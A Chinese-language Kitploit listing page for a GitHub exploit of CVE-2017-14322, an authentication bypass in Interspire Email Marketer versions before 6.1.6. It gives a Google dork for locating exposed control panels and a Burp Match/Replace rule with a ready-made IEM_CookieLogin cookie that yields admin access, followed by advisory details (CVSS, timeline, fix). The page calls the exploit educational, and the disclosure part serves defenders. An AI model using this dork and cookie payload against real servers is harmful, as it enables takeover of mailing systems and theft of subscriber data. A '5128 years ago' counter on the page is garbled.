Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2017-14322 — CVE-2017-14322 Interspire Email Marketer (emailmarketer) 漏洞利用 | Kitploit
工具/GitHubGitHub/joesmithjaffa/cve-2017-14322
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubjoesmithjaffa/cve-2017-14322

CVE-2017-14322

CVE-2017-14322 Interspire Email Marketer (emailmarketer) 漏洞利用

查看仓库
5128年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2017-14322 Interspire Email Marketer (emailmarketer) 漏洞利用

Google Dork

root@kitploit:~
intitle:"Control Panel" + emailmarketer

使用 Burp Suit 进行漏洞利用

为请求头添加一个 Match 和 Replace 规则,如下所示:

root@kitploit:~
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D

打开站点时,由于不存在 Cookie 头,第一次不会生效。使用添加了上述规则的 Burp 代理第二次刷新站点,你就会看到想要的结果。确保勾选 “Intercept Client Requests”。

标题:

Interspire Email Marketer - 远程管理员身份验证绕过

作者:

Hakan Küsne, Infoteam Security (CH)

CVE-ID:

CVE-2017-14322

风险信息:

CVSS 基础评分: 9.8 CVSS 向量: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O

时间线:

2017-09-12 发现漏洞 2017-09-12 发现供应商已修复该漏洞,但从未告知客户,导致野外仍有数百个系统易受攻击 2017-10-17 公开披露

受影响的产品:

Interspire Email Marketer 6.1.6 之前的版本

厂商主页:

http://www.interspire.com/emailmarketer/

详情:

负责检查用户是否已登录的函数位于 Interspire Email Marketer (IEM) 6.1.6 之前的版本中的 init.php, 该函数允许远程攻击者通过使用特制的 IEM_CookieLogin cookie 值绕过身份验证并 获得管理访问权限。 此外,如果客户没有年度维护计划, 应用程序会声称它运行在最新的可用版本上,并且没有更新。

这些漏洞是在对应用程序的一个受入侵实例 进行事件响应时发现的。

概念验证:

详情请参见: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html

修复:

供应商已在 6.1.6 版本中修复了该漏洞,但从未专门向其客户告知。

注意:

此漏洞利用工具仅用于教育目的,不对你自己的行为负责。

下载工具